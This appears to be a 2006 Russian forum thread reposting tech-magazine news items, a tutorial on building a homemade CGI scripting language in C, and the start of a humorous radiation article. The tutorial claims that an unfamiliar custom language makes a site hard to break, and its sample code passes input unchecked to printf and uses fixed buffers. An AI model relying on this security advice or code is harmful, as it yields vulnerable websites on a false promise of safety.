Оказывается, обычные термопасты передают тепло от камня к радиатору не так хорошо, как хотелось бы инженерам, разрабатывающим новое поколение процессоров. Поэтому термопасте начали искать замену. И вот, как недавно установили ученые,углеродные нанотрубки могут стать эффективным передатчиком и даже рассеивателем тепла. Так, Тимоти Фишер (Timothy S. Fisher) и его коллеги из университета Пардью (Purdue University) смогли покрыть ковром из нанотрубок поверхность рассеивающего радиатора, увеличив скорость передачи тепла между ним и охлаждающей поверхностью. Получившийся наноковер из углеродных нанотрубок имел сходство с обычной застежкой-липучкой, поэтому исследователи его назвали "Thermal Velcro". Первоначальная цель исследователей состояла в разработке новых типов тепловых интерфейсов, обеспечивающих более быструю передачу тепла от микросхем к охлаждающему радиатору. Тимоти и его команда назвали новый материал "застежкой" (Velcro), потому что сначала и чип, и радиатор покрывают тонким ковром из нанотрубок, а затем соединяют обе части так, как если бы вы застегивали застежку-липучку. Естественно, такой термоинтерфейс не обеспечивает механической адгезии двух поверхностей, но из-за контактирования нанотрубок между собой он является хорошим передатчиком тепла. Как установили ученые, чипы нагреваются не только изнутри, но и в местах контакта с термопастой, которая не успевает полностью передать тепло радиатору. Так, при использовании традиционных термоинтерфейсов чип на поверхности дополнительно нагревается на 15° С, а "липучка" из нанотрубок вызывает дополнительный нагрев микропроцессора всего на 5° С. Поскольку в будущем размеры чипов уменьшатся и, соответственно, их нагрев увеличится, то даже несколько градусов будут важны для работоспособности устройства. Технология термоинтерфейса уже подготовлена к коммерческому распространению, и компании, участвовавшие в исследовании, намерены вскоре показать на основе Thermal Velcro серийную продукцию.

Непростой электронож

Забудь про обычные электрошокеры! Сейчас модна другая фишка - нож, который больно стреляет током. И предлагает это удовольствие канадская компания Shocknife всего за $444.

Shocknife выглядит, как нож, и весит примерно также, но не может нанести серьезной травмы. Притом, что длина его лезвия - 28 сантиметров. От прочих ножей для тренировки навыков рукопашного боя его отличает одно важное новшество: весь край "лезвия" (и сверху, и снизу) у Shocknife представляет собой сплошной электрошокер, способный при контакте выдать разряд в 7,5 тысяч вольт (на рукоятке есть кнопка активации). Авторы разработки полагают, что шоковый нож намного эффективнее в тренировках по рукопашному бою, чем обычные в таких случаях деревянные или резиновые ножи, так как при пропуске удара Shocknife вызывает у обороняющегося сильную боль, заставляя его действительно стараться. Кроме того, этот нож четко "локализует" точку удара, позволяя анализировать свои ошибки в технике боя. Еще он позволяет тренирующемуся чувствовать даже небольшие "порезы". Чтобы тебя или твоего друга случайно не зашибло от электроразряда, на ноже есть специальный регулятор мощности на 4 положения. В принципе, электронож может применяться и как оружие самообороны, но, в первую очередь, канадцы рассчитывают на внимание полиции и армии, спецподразделений и клубов единоборств, так как считают Shocknife идеальным тренировочным инструментом.
Кибершмель, питающийся радиоволнами

Практически все воздушное пространство вокруг нас заполнено радиоволнами. А если попробовать как-то использовать эту даровую энергию, за которую платят теле- и радиопередающие станции? Такую идею выдвинула гавайская компания Ambient Micro в сотрудничестве с гавайским отделением компании Trex Enterprises. И не просто выдвинула, а начала активно воплощать в жизнь. Она работает над крошечными магнитными антеннами и другими узлами, которые преобразовывают в постоянный ток пробегающие мимо низкочастотные радиосигналы от радио— или телевизионных станций. На этом принципе работают обычные детекторные приемники — этой энергии хватает на то, чтобы услышать звук в наушниках. Но хитрые гавайцы пошли дальше: почему бы не сделать сверхлегкий летающий девайс с малым потреблением электроэнергии, который бы летал и высматривал все вокруг, получая питание как раз из телерадиоэфира? К июню 2006 года компания намерена представить первый небольшой модуль MS-AMPS (Multi-Source Ambient Power Supply — блок питания с множественным окружающим источником энергии), который должен оказаться способным заменить литиевую батарейку в маломощной аппаратуре. На днях компания Ambient Micro получила от американских ВВС (USAF) $100-тысячный контракт на развитие такой системы питания датчиков для маленьких беспилотных разведчиков (размером с муху или шмеля). А ранее из ряда других государственных источников — почти $400 тысяч на проработку всей этой технологии и создание действующих прототипов. Так что увидишь такого шмеля — бей его сразу!

Ужас, летящий на крыльях ночи, - мегаваттный лазер на борту Boeing 747

Для защиты америкосов от ядерных террористов Northrop Grumman, Boeing и Lockheed Martin построили боевой мегалазер с мегаваттным лучом, поднимающий в воздух на крыльях Boeing 747. Этот "фонарик" способен уничтожать межконтинентальные ракеты на стадии взлета с приличной дистанции. Сегодня все ингредиенты этого экзотического оружия уже выполнены "в металле" и проведены пробные полеты. Чудовищный лазер является, вообще-то, связкой из шести одинаковых лазерных модулей, расположенных в форме V6, словно шестицилиндровый двигатель какого-нибудь гигантского грузовика. Только "на вал" тут выводится не вращение, а луч. Боевой лазер – инфракрасный химический, кислородно-иодный (Chemical Oxygen Iodine Laser — COIL). Для его работы на борту лайнера имеется целая батарея баков с химическими реагентами, которые мощные турбонасосы в момент залпа прогоняют через систему. COIL монтируется в задней части фюзеляжа Boeing 747. Оттуда его смертельный луч через сложную оптику проходит вперед, к носу лайнера. Основной лазер — один из самых крупных компонентов всего комплекса, а ведь чтобы такой аппарат смог подняться в небо, его создатели, где только возможно, применяли пластик, композиты и титан. На вершине фюзеляжа имеется довольно мощный углекислотный лазер, с помощью которого машина определяет расстояние до цели. Приемник этой системы также помогает другим датчикам в определении ее координат. Далее в действие вступает поворотная шаровая башня на носу лайнера, где раскрывается окно с 1,5-метровой (в диаметре) оптической системой. По плану, в 2008 году, готовый комплекс ABL (Airborne Laser) должен в полете сбить реальную баллистическую ракету. С учебным ядерным зарядом smile.gif.

300 тысчяч лет с iPod'ом

Если ты засунешь любимый iPod в воду, то, скорее всего, ничего хорошего из этого не выйдет. Однако надо уметь засовывать в девайсы воду, чтобы получить что-то толковое. "Замочить" компьютерные чипы удалось группе ученых из Университета Пенсильвании, Университета Дрексела и Гарвардского университета. Как они установили, именно вода может стать одним из компонентов сверхъемкой компьютерной памяти. Так, им случайно удалось обнаружить изменение электродинамики нанострун при попадании их отдельных фрагментов в водную среду.

Наноструны из ферроэлектриков имеют диаметр всего-навсего в несколько атомов. Но это не мешает им быть отличными хранителями информации. На отдельных отрезках ферроэлектриков формируются диполи, которые и являются битами. Однако диполи возникают на нанострунах спонтанно, и нельзя, например, записать информацию на нанонить и затем ее считать - настолько дипольные структуры нестабильны. И в этом случае ученым случайно удалось обнаружить естественный "стабилизатор", который не дает случайным образом пропадать записанной информации. Им оказалась обычная вода, в которую ученые случайно поместили части нанострун. Ученые подсчитали плотность хранения информации в "водной" памяти на основе ферроэлектрических нанонитей. Согласно их расчетам, в кубическом сантиметре можно будет хранить до 100000 терабит! Вот если такую память запихать в iPod, то можно хранить до трехсот тысяч лет (!) непрерывного звучания музыки, записанной в MP3-формате. А если весь объем DVD-диска заменить на соответствующий объем нанопамяти, то его емкость составит до десяти тысяч лет просмотра видеофильмов в высоком качестве.

Самый дешевый ноутбук

Ноут - вещь всегда нужная, только на него не всегда можно выделить кругленькую сумму. Представь себе, что чувствуют китайцы или индийцы, у которых денег еще меньше, чем у нас? А им тоже работать надо! Для таких вот целей компания Intel наконец-то официально презентовала недорогой ноутбук для развивающихся стран. Доступность в понимании Intel — это $400, за которые потребитель получит пусть не очень мощный, но совершенно полнофункциональный ноутбук. Новый ноутбук носит кодовое имя Eduwise. Подробностей известно немного: операционная система — Windows или Linux, выход в Интернет через канал Wi-Fi. Корпус-сумка с ручкой и застежкой-кнопкой, по замыслу Intel, должны понравиться преподавателям и студентам. Ведь именно для развития образования новинка и предназначена. Новый ноут добавляет остроты в борьбу компаний за массовую компьютеризацию третьего мира. Только недавно исполнительный директор Intel Крэйг Барретт раскритиковал проект ноутбука за $100 Николаса Негропонте из медиа-лаборатории Массачусетского технологического института (MIT Media Lab). А свои 5 копеек в видении доступного компьютера для развивающихся стран предложил даже дядюшка Билли. Дешевый ноут Eduwise, как обещает Intel, можно будет купить уже в следующем году.

Студенты сделали дешевый и удобный марсианский скафандр

Если нужно сделать что-то дешево и сердито, всегда вспоминают о студентах. То же самое произошло, когда потребовался недорогой и работоспособный марсианский скафандр. Американское космическое агентство (NASA) предоставило грант в размере $100 тысяч консорциуму космических грантов Северной Дакоты (North Dakota Space Grant Consortium) для осуществления проекта "Планетарный скафандр" (Planetary Space Suit). Всего через год работы его построили примерно 40 студентов из пяти вузов Северной Дакоты во главе с представителями университета штата (University of North Dakota). Полученный скафандр оказался очень легким и гибким - его вес на Земле составляет всего 21,3 килограмма. Полевые тесты на местности, напоминающей марсианскую, показали, что человек в новом скафандре может спокойно садиться на корточки, поднимать с земли камни и очищать их от пыли, работать разными геологическими инструментами, вести "марсоход", легко наживлять на болт гайку и закручивать ее пальцами. Более того, гибкость перчаток скафандра настолько велика, что астронавт сможет запросто воспользоваться шариковой ручкой, оставляя в блокноте записи совершенно не отличимые от тех, что может сделать человек без перчаток. С помощью двух человек новый скафандр надевается за 20 минут, что очень и очень неплохо. Все материалы и герметичные сочленения нового костюма рассчитаны на работу с большим перепадом давления (снаружи и внутри), а также на длительное сопротивление разрушающему действию марсианской пыли. В костюме предусмотрены мощные слои теплоизоляции и система терморегулирования. Ранец новинки рассчитан на быструю "горячую" замену расходных материалов (порядка 5 минут). Вот такие уникальные вещи делают студенты, если им дать денег!

HARD NEWS

Сергей Никитин

Летняя музыка

К летнему сезону компания Cowon обещает нам выпустить интересную новинку – плеер iAuduo6, сердцем которого является микровинчестер 0,85” компании Toshiba с емкостью 4 Гб. Имея очень компактные размеры (76,1x35,6x19 мм, вес — 60 г), плеер обладает обширными возможностями. Это воспроизведение видео (XViD MPEG-4), аудио (MP3, WMA, OGG, ASF, FLAC, WAV), текстовых (TXT) и графических файлов (JPEG). Просмотр, кстати, обеспечивает цветной ЖК-экран размером 1,3 дюйма. К дополнительным возможностям относятся диктофон (с прямым кодирование записи с MP3), радиотюнер и многофункциональная сенсорная панель управления, которая позволяет воспроизводить запись, перематывать треки и регулировать громкость звучания. C компьютером устройство держит связь через интерфейс USB 2.0, также плеер поддерживает обновление встроенного ПО. Кстати, заявленное время работы от одной зарядки аккумулятора составляет 20 ч. Появление на прилавках ожидается в июне.

Blu-Ray от TDK

Пока проходят споры мегакорпораций о том, какой формат оптических драйвов станет стандартом и чьи разработки лягут в его основу, компания TDK начала поставлять в России диски Blu-Ray (BR). На них можно спокойно записывать фильмы в сверхвысоком качестве Hi-Definition (1920x1080) со звуком, счастливо избежавшим компрессии. В настоящий момент для приобретения доступны диски емкостью 25 Гб. Различаются они форматами: на BR-R можно только записывать информацию, а на BR-RE есть возможность перезаписи. Скорость записи составляет 2х (72 Мб/с). Достигается это значение благодаря применению специального записывающего слоя CuSi (медь и кремний). Кроме того, эти диски обладают повышенной стойкостью к воздействию ультрафиолета, фирменное покрытие DURABIS2 спасет изделие от царапин и загрязнений. Кроме того, эти кругляшки выдерживают 10000 циклов перезаписи.

Два ядра в одном ноутбуке

Мощный ноутбук уже давно не является чем-то мифическим. Сегодня компания MSI представляет олицетворение мобильной мощи – устройство S271, оснащенное процессором AMD Turion 64 X2 Dual Core. Кроме этого, он имеет 12-дюймовый экран (1280x800 пикселей с соотношением сторон 16:10), графический чип ATI Radeon Xpress200, поставляется с 512 или 1024 Мб ОЗУ, а также с жестким диском объемом до 120 Гб (скорость вращения шпинделя 5400 об/мин). Нельзя не отметить наличие таких беспроводных интерфейсов, как Wi-Fi b\g и BlueTooth 2.0. Ноутбук оснащен сенсорным манипулятором курсора Butterfly Touchpad, повышающим удобство работы, а также технологиями динамического разгона ЦП и ГП и системой энергосбережения. А меломаны оценят аудиосистему объемного звучания, которой снабжен S271. Корпус устройства создан из алюминиево-магниевого сплава, имеет толщину 2 см, а весит 2 кг.

Внедорожная мышь Logitech

Джип отличается от обычной машины своей надежностью, мощностью и проходимостью, а комфорт передвижения часто остается на втором месте. Если проводить аналогии, то новая мышь от компании Logitech похожа на очень дорогой внедорожник: она работает в любых условиях, при этом имея высокую эргономику, являясь, таким образом, превосходным решением для мобильных пользователей. Технология двойного лазерного отслеживания позволяет мыши работать практически на любых поверхностях, корпус устройства защищен от ударов, а ресивер, подключающийся к порту USB (мышь беспроводная, работает на частоте 2,4 ГГц и на расстоянии до 9 м от компьютера), во избежание потери можно упрятать внутрь корпуса мыши. Устройство оснащено колесиком прокрутки Logitech Tilt Wheel Plus Zoom, которое позволяет пользователям легко и просто прокручивать экран сверху вниз и слева направо, а также увеличивать и уменьшать масштаб при просмотре цифровых фотографий, Web-страниц и документов. Кроме того, мышь работает от одной батарейки АА и имеет на корпусе индикатор ее заряда. Мышь доступна для приобретения по цене менее 100 долларов.

Сенсорный дисплей CTX

Если тебе надоело настраивать свой монитор, постоянно тыкая пальцем в кнопки, расположенные обычно сбоку или снизу, а настройку через утилиту он не поддерживает, то присмотрись к новым моделям ЖК-экранов компании CTX, которые имеют сенсорное управление, существенно облегчающее процесс работы с ними. Ею оснащены две 17-дюймовые модели: PV711T и PV711BT. Эти устройства снабжены пятипроводным резистивным тактильным датчиком, который отличается стабильностью работы и высоким сроком службы, позволяет вводить данные стилусом, ногтем, кредитной картой, пальцем или рукой в перчатке, а прочная вращающаяся подставка обеспечивает удобство работы. Технические характеристики устройства таковы: разрешение — 1280х1024, контрастность — 500:1, яркость — 300 кд/м2, соединение с ПК через D-Sub или USB. Стоимость устройства — чуть более 600 долларов, и оно уже доступно покупателям.

Новый кулон IRIVER

На российский рынок поступила новинка от компании IRIVER – плеер-кулон N12. К нему прилагаются специально разработанные наушники, соответствующие имиджевой направленности устройства: без удлиненных проводов, выполненные в виде замкнутого круга, как бусы или колье, на которые крепится кулон. Стильность устройства подкрепляется одноцветным полузеркальным OLED-экраном с 16-ю оттенками, кристаллом Swarovski в корпусе черного цвета и оригинальным "скринсейвером" с фирменным танцующим человечком. Впрочем, функциональность плеера от этого нисколько не пострадала: 1 Гб памяти (старшая модель), работа с форматами MP3, WMA, ASF и OGG Vorbis, эквалайзер, система 3D-звучания, соотношение сигнал/шум – 90 дБ, максимальная выходная мощность – 14 мВт на канал. Дополнительно плеер оснащен часами с будильником и таймером, радиотюнером и диктофоном. Размеры плеера составляют 27,2х48,8х13,3 мм, вес с аккумулятором — 23 г, а время работы — 13 ч. Девайс имеется в магазинах по цене 200 долларов.

ASUS подгоняет физику

Чтобы разгрузить центральный процессор и придать играм новые возможности, компания ASUS выпустила плату PhysX P1, оснащенную чипом Ageia PhysX, который является физическим ускорителем: с его помощью в играх мы увидим реалистичное изображение взрывов, правильный, соответствующий всем законам физики полет обломков от них, настоящее течение воды, натуральное столкновение двух и более твердых тел, а также то, как ветер разрывает густую пелену дыма или тумана. Центральный же процессор освобождается для обработки искусственного интеллекта и игровой логики. В общем, красота. Плата работает со 128 Мб памяти GDDR-3, ширина ее шины составляет 128 бит, а частота — 733 МГц. Стоит отметить, что эти платы уже появились в продаже. Игры, рассчитанные на работу с ними, уже находятся в разработке. Отметим также тот интересный факт, что компания NVIDIA готовит к выходу на рынок похожее решение.

Вот это колонки!

Как ты смотришь на то, чтобы твоя звуковая система была выдающейся во всех смыслах этого слова? То есть качественный звук — это само собой разумеющееся, но хотелось бы еще чего-нибудь эдакого. Модель AVE D100 (система 2.0) как раз для тебя. Хотя бы потому, что высота колонок составляет полметра, а RMS-мощность — 80 Вт. Кроме того, в этих гигантах вольготно разместились 8-дюймовые басовые динамики. В комплект поставки входит пульт дистанционного управления, на одной из колонок находится блок управления с небольшим ЖК-экраном, регулятором громкости звука, баса и тона, а также разъемами для подключения двух микрофонов (для фанатов караоке). Кроме того, колонки имеют провода для подключения не только к компьютеру, но и к DVD-плееру, и телевизору. Размер устройств составляет 49х20х30 см, а гарантия на них 1 год. Цена комплекта составляет около четырех тысяч рублей.



Автор: Tier Nov 17 2006, 16:23

Цитата
Кибершмель, питающийся радиоволнами

Практически все воздушное пространство вокруг нас заполнено радиоволнами. А если попробовать как-то использовать эту даровую энергию, за которую платят теле- и радиопередающие станции? Такую идею выдвинула гавайская компания Ambient Micro в сотрудничестве с гавайским отделением компании Trex Enterprises. И не просто выдвинула, а начала активно воплощать в жизнь. Она работает над крошечными магнитными антеннами и другими узлами, которые преобразовывают в постоянный ток пробегающие мимо низкочастотные радиосигналы от радио— или телевизионных станций. На этом принципе работают обычные детекторные приемники — этой энергии хватает на то, чтобы услышать звук в наушниках. Но хитрые гавайцы пошли дальше: почему бы не сделать сверхлегкий летающий девайс с малым потреблением электроэнергии, который бы летал и высматривал все вокруг, получая питание как раз из телерадиоэфира? К июню 2006 года компания намерена представить первый небольшой модуль MS-AMPS (Multi-Source Ambient Power Supply — блок питания с множественным окружающим источником энергии), который должен оказаться способным заменить литиевую батарейку в маломощной аппаратуре. На днях компания Ambient Micro получила от американских ВВС (USAF) $100-тысячный контракт на развитие такой системы питания датчиков для маленьких беспилотных разведчиков (размером с муху или шмеля). А ранее из ряда других государственных источников — почти $400 тысяч на проработку всей этой технологии и создание действующих прототипов. Так что увидишь такого шмеля — бей его сразу!



я те про такую хреновину говорил, еогда ты свой долбаный приемник собирал. они у меня идею сперди)))
а про банкомат вот дауны, сразу не моги побольше снять и сразу с этим завязать, или хотябы не пользоваться одними и темиже, ну надож такими тупыми быть а...


а про халявную энергию, если кому нить удасться дописать теорию единого поля Энштейна, то ее завались будет хотябы из разности гравитационных полей между телами.

Автор: Metallica Nov 17 2006, 16:29

Цитата(Tier @ Nov 17 2006, 17:23) *

я те про такую хреновину говорил, еогда ты свой долбаный приемник собирал. они у меня идею сперди)))
а про банкомат вот дауны, сразу не моги побольше снять и сразу с этим завязать, или хотябы не пользоваться одними и темиже, ну надож такими тупыми быть а...
а про халявную энергию, если кому нить удасться дописать теорию единого поля Энштейна, то ее завались будет хотябы из разности гравитационных полей между телами.
К
Как у моей васи было тоже на мобиле мини фиговина и при звонке светилась а камеру отволн глючило
как прям на светофоре

Автор: Metallica Nov 17 2006, 17:53

Пишем свой PHP
Разрабатываем собственный язык web-сценариев

Perl, Python, PHP, ASP – языков для веб-кодинга сейчас навалом, и все очень активно ими пользуются. Еще бы: динамический контент, удобное управление сайтом, форумы, "голосовалки", движки всякие. В общем, одним статичным HTML для создания сайта уже очень давно никто не обходится. Типичные ошибки, появляющиеся изо дня в день в скриптах на этих языках чуть ли не стандартизированы. Чувствуешь всю опасность ситуации? Чтобы сайт было действительно сложно сломать, он должен быть либо на обычном HTML, без всяких динамических наворотов, либо использовать свой собственный язык сценариев, еще неизвестный взломщику. А если учесть, что без динамического контента сейчас не жизнь, то у нас один выход – написать свой личный скриптовой язык и воспользоваться им при разработке сайта.

Все, что нам необходимо для быстрого старта, – это веб-сервер, роль которого успешно сыграет Denwer и любой компилятор Си на твой выбор.

Интерпретатор web-языка может работать как cgi-приложение или как модуль web-сервера. Типичный модуль – это PHP. Типичные же представители cgi-языков – это Perl или Python. Ты, наверное, замечал, что скрипты для них помещены в отдельную папку (чаще всего cgi-bin), а первая их строка представляет собой что-нибудь вроде #!/usr/bin/perl. Если залезть в директорию /usr/bin/, то можно обнаружить там файл perl (perl.exe в windows) – это интерпретатор языка Perl. Это означает, что первой строкой в cgi-скриптах идет путь к приложению, ответвленному за их обработку. Web-сервер должен запустить его с такими параметрами, чтобы интепретатор понял, что ему нужно интерпретировать. Давай посмотрим, с какими. Для этого создавай в Си консольное приложение и вбивай туда следующий код:

#include <iostream>

#include <stdlib.h>

// подключаем нужные хидеры

using namespace std;

// пространство имен

int main(int argc, char *argv[])

{

for (int i = 0; i < argc; ++i)

{

printf(argv[i]);

// выводим переданный аргумент

printf("<br>");

// переходим на следующую строку

}

return 0;

// говорим, что все хорошо

}

Эта небольшая программка просто выводит каждый аргумент, с которым она была запущена. Нам очень важно разобраться, как же работают cgi-интерпретаторы, так как Apache будет ее запускать вовсе не на наших глазах. Компилируем код и сохраняем получившийся файл в /usr/bin/test.exe. Далее создаем файл /home/localhost/cgi-bin/test.tst (я использовал расширение tst, хотя ты можешь использовать любой - хоть обычный cgi) со следующим содержанием:

#!/usr/bin/test

// адрес нашего интерпретатора

print "Content-type: text/html\n\n";

// даем знать, какого типа возвращаемый результат

Открываем браузер и заходим по адресу: http://localhost/cgi-bin/test.tst. На экране мы увидим, что наша программа запускалась с двумя аргументами: /usr/bin/test и \home\LOCALH~1\cgi-bin\test.tst. Несложно понять, что первый является адресом интепретатора, а второй - адресом скрипта на сервере, который мы открывали браузером. Многое стало ясно. Оказалось, что переменная argv[1] в Си будет содержать имя интерпретируемого файла.

[пишем основу]

Теперь как ты, наверное, догадался, нам нужно считать все из этого файла (нашего исходника) для последующего анализа. Для этого воспользуемся классом ifstream, который стал доступен, когда ты подключил хидер fstream в самом начале нашего интерпретатора.

Сотри все содержимое функции main, кроме последней строки, и введи следующее:

ifstream fin;

// Создаем обьект fin класса ifstream.

fin.open(argv[1]);

// Читаем исходный код нашей программы

char buf[80];

// Создаем буфер для чтения из файла

while (fin.getline(buf, 80)) // читаем построчно файл

{

// Здесь будет происходить обработка

// исходного кода нашего скрипта

}

Наш интерпретатор будет построчно читать файл и как-нибудь его интерпретировать. Реализовать построчную интерпретацию куда проще, чем хитрые многопроходные системы. Давай теперь придумаем синтаксис нашего web-языка. Придумаем и тотчас реализуем.

Начнем, пожалуй, с комментариев, без которых никуда. Будем игнорировать всякую строку, начинающуюся символом #. Добавляем в главный цикл для этого соответствующую (кстати, всего одну) строку:

if (buf[0] == *"#" || strlen(buf) == 0) continue;

Смысл у нее простой: если первый символ считаемого буфера является символом # или размер буфера считываемой строки нулевой (то есть она пуста) тогда мы выполняем continue. Ключевое слово continue означает завершение текущего шага цикла и переход к следующему. Так-с, идем дальше.

Для удобной отладки скриптов я решил ввести в интерпретатор счетчик строк, указывающий на текущую читаемую строку. С его помощью, если вдруг в скрипте ошибка, можно всегда точно определить, где она находится. Реализует он все это дело элементарно. Объявляется переменная line перед циклом:

int line = 0;

И в самом начале цикла мы эту переменную увеличиваем на единицу:

++line;

Она нам еще пригодится.

Далее я решил, что все переменные в моем языке не будут иметь четкой типизации, то есть они не будут четко делиться на строковые, числовые и т.п. Для их хранения нам потребуется описать структуру. Я предлагаю вот такую:

struct my_type

{

char ch[30]; // имя переменной

char nm[255]; // значение переменной

};

Копия такой структуру хранит название одной переменной и ее значение. Чтобы была возможность хранить большее количество таких переменных, нужно описать массив подобного типа. Делается это так:

my_type vars[999]; // массив структур my_type

int vars_count = 0; // текущее количество переменных

Так мы и будем хранить все переменные. Все очень просто. Чтобы ты понял, к чему я стремлюсь, я заранее приведу пример скрипта для нашего web-языка. Надеюсь, синтаксис у тебя не вызовет вопросов.

#!/usr/bin/test

# адрес интерпретатора

pragma = first

# название программы

var

# описание всех переменных после слова var

# переменная = значение

test1 = 0

test2 = 0

# start сообщает нас о начале кода

start

# числовые операции

test1 = 9

test2 = test1

stop

# после слова stop код вообще не читается

Вот такого плана будут все описанные на нашем языке программы. Для того чтобы это реализовать, нам потребуются дополнительные, не очень сложные функции. Их прототипы приведены ниже, а полный их код ты найдешт на диске.

str_to_int(char * str);

// преобразовывает строку в число

exit_error(char * error, int line);

// выводит сообщение об ошибке кода

my_type get_vars(char* somevar);

// возвращает структуру переменных

// из строки вида "переменная = значение"

bool like(char * str1, char * str2);

// сравнивает две строки

void show_var(char * var);

// выводит значение переменной на экран

[распознавание кода]

Для того чтобы скрипт читался правильно, предлагаю ввести переменную int step, которая бы показывала, на каком шаге выполнения сейчас находится наш код. Я ввел такую зависимость выполнения от значения переменной:

0 - мы на шаге поиска названия программы;

1 - на шаге поиска слова var;

2 - на шаге получения переменных и поиска слова start;

3 - на шаге выполнения кода и поиска слова stop;

Язык наш очень строгий. Любое нарушение правил влечет за собой сообщение об ошибке. Неверный порядок команд ведет к тому же. Поэтому постараемся быть аккуратнее и не нарушать созданные нами правила.

Итак, поехали. Начнем описывать реакцию интерпретатора на те или иные команды. Например, код вывода значения переменной на экран (команда show):

if (like("show", buf)) // если найдена команда show

{

my_type bt = get_vars(buf);

// получаем структуру из текста вида "show = var"

show_var(bt.ch);

// Выводим на экран

}

Такая легкая конструкция приводит к очень красивому результату. Далее все команды будут находиться посредством функции like и выполняться. Следуя этому принципу, я придумал следующие математические операции:

plus var1 var2 - Равносильно var1 = var1 + var2

minus var1 var2 - Равносильно var1 = var1 - var2

multi var1 var2 - Равносильно var1 = var1 * var2

share var1 var2 - Равносильно var1 = var1 / var2

Так же мы можем добавить даже работу с MySQL. Можно в наш язык добавить поддержку циклов и, вообще, чего только душа пожелает. Но в данном примере я решил оставить только одну очень важную команду, без которой действительно не обойтись – это if. Шаблон у нее будет такой:

if var1 var2

#command

Принцип работы очень простой. Интерпретатор находит команду if, затем, если переменная var1 равняется переменной var2, выполняет команду, записанную в следующей строке, если они не равны, то команду он попросту игнорирует. Реализация проста, зато невероятно полезна. Например, ТОЧНОЕ сравнение строк можно произвести посредством трех функций: like, strstr и strlen.

После условия можно ввести уже не такую необходимую, но все равно очень полезную команду, которая выводила бы содержимое текстового файла, так как писать весь html-код в самой программе – это слишком. Команде я дал название read. Прототип такой:

read = var1

Найдя эту команду, интерпретатор открывает содержимое файла, записанного в var1, и выводит его нам на экран посимвольно. Реализуется команда несложно. В массиве структур находится именно та переменная, которая носит имя var1. Получается ее значение. Далее нами создается объект класса ifstream, с помощью которого читается файл и производится его посимвольный вывод.

Используя такой движок можно придумать любые команды. Главное - фантазию иметь.

[выжимаем из него все]

Основа у нас есть и, по-моему, неплохая. Теперь можно приступить к написанию собственного сайта на нашем языке. Идея сайта простенькая. Имеется домашняя страница. В ней 3 раздела: «контакты», «о себе» и «главная». Вся реализация - в одном файле. То есть, для того чтобы выполнить задуманное, нам придется работать с какой-то переменной. Брать мы ее будем из адреса посредством команды get. Также у сайта будет верхушка (файл top.txt), содержимое которого будет считываться на экран. Ниже приведен исходный код реализованной и вполне рабочей странички:

#!/usr/bin/dkt

# пример использования созданного веб-языка

# название программы

pragma = first

# описание переменных после слова var

var

# блок переменных

section1 = main

section2 = about

section3 = contact

file1 = main.txt

file2 = about.txt

file3 = contact.txt

top = top.txt

links = links.txt

bottom = bottom.txt

tmp = empty

emp =

# start означает начало программы

start

# читаем файл, который записан в переменной top

read = top

# читаем файл, который записан в переменной links

read = links

# получаем главную переменную

get tmp 1

# если она пуста (сравниваем с пустой переменной)

if tmp emp

# то выводим сообщение

show = '<center> выберите, пожалуйста, раздел </center>'

if tmp section1

read = file1

if tmp section2

read = file2

if tmp section3

read = file3

stop

Пример работы ты можешь увидеть на скриншоте. Это самый простой пример использования самой простой реализации нашего языка. Думаю, ты понял, что можно использовать html-код, который украсит все наши работы. Одна переменная может менять содержимое сайта, и наша одна страничка становится динамической. Между прочим, такую технологию можно будет использовать для смены шаблона.

[выводы]

Если у тебя сервак или хостер разрешит повесить свой бинарник в систему, то ты можешь использовать собственные web-проекты, разработанные так, как тебе удобно. Не всегда следует делать «как все». Иногда нужно выделиться из толпы. К тому же использование популярных вещей – это просто небезопасно.

INFO

В примерах я использую /usr/bin/, хотя на самом деле адрес у меня такой: k:/usr/bin/. Просто Apache собран так, как будто это /usr/bin/.

INFO

/home/localhost – рутовая директория нашего web-сервера, то есть именно отсюда будет черпать информацию пользователь, забравшийся браузером на localhost wink.gif.


















Игры с радиацией


Радиоактивная картонка низкого разрешения

Радиация - детям не игрушки. Херосима, Чернобыль, черепашки Нинзя и лейкемия - вот что бывает, когда лишняя пара килограммов оружейного плутония попадает не в те руки. У нашего приятеля Генри Шеппарда на этот счет есть другое мнение. Несмотря на кучу угроз со стороны специалистов МАГАТЭ и совбеза ООН, он все же раздобыл кусочек ядерной боеголовки, потер ее на терочке и изготовил радиоактивную картонку, которую теперь пытается продавать под видом монитора на митинском радиорынке.

«Тяжелая физика», которая связана в первую очередь с легкими частицами, как правило, вызывает отнюдь не легкую оторопь у новичка. Загадочные названия, неудобоваримые правила сведения формул и совершенно ненормальные прилагательные сбивают с толку даже самых стойких. Последний фактор, кажется, пугает больше всего: описывать очередную частицу как «красивую», «очаровательную» или «очарованную» - выше понимания среднестатистического человека. Но это такие же мелочи, как и полувековые попытки признания своего гения каждым физиком. Планк добился уважения только в предпенсионном возрасте, когда слава уже не радует. Супруги Кюри наверняка стонали под гнетом счетов от врача, который хоть и не знал ничего об облучении, но деньги, несомненно, любил. Известный каждому школьнику Резерфорд успел воспитать более полусотни учеников, но где теперь они - ау! Их имена знают только посвященные. Тебя это может впечатлить, а вот меня - нет. Проблема всех этих, несомненно, гениальных ученых заключается в полном непонимании основ менеджмента. Какая может быть польза от тяжелой формы лейкемии или других последствий облучения? В лучшем случае чисто медицинская и иногда политико-демографическая, но это уже входит в область преступлений против человечества.

Нас же интересует практическое применение радиации. Ты не «очитался»: на самом деле радиация страшна только в газетных заметках или на территории ядерных полигонов, где она заботливо культивируется. Но студентов, будущих талантливых членов общества, совершенно бессовестно заставляют с ней сталкиваться.

Например, вторая или третья классическая лабораторная работа для первокурсников на всех факультетах ФизТеха связана с подсчитыванием «космических» alpha-частиц. Дикость этих мероприятий можно описать парой слов: на протяжение 2-3 часов проведения этой экзекуции лабораторный зал оглашается звуками «мяу», «гав» и «ку-ка-ре-ку!». На самом деле радиация здесь ни при чем - уставшие студенты быстро делились на пары: при отлове очередной заблудшей частицы первый студент тут же озвучивал это событие мяуканьем или кукареканьем, чтобы второй мог поставить очередную галочку, не отрываясь от кроссворда. Данные сохранены с точностью до долей секунды, преподаватель рад четко рассчитанной работе, а студент после эйфории от первой сданной лабы начинает ломать голову: зачем это было нужно?!

На самом деле никакой пользы из этой процедуры я не вынес. Как студент, я понял, что посещение лабораторных работ чревато скукой, а непосещение - проблемами с деканатом, но все же технические возможности лаборатории щекотали нервы. Попытка устроиться охранником на полставки увенчалась успехом и дала возможность поподробнее поковыряться в технике 70-х годов. Первое впечатление: непревзойденный шедевр гигантизма! Второе - а что с этим делать? Третье - а почему это еще и так дорого и секретно?

